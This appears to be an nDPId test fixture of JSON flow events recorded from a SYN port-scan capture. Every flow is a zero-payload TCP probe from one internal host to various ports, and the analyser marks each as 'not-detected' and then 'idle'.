-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1095,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1096,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1096,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1097,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9290,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1098,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1098,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1097,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9290,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1098,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1098,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1045,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1045,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1104,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1104,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1104,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1104,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1105,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1105,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1107,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1108,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 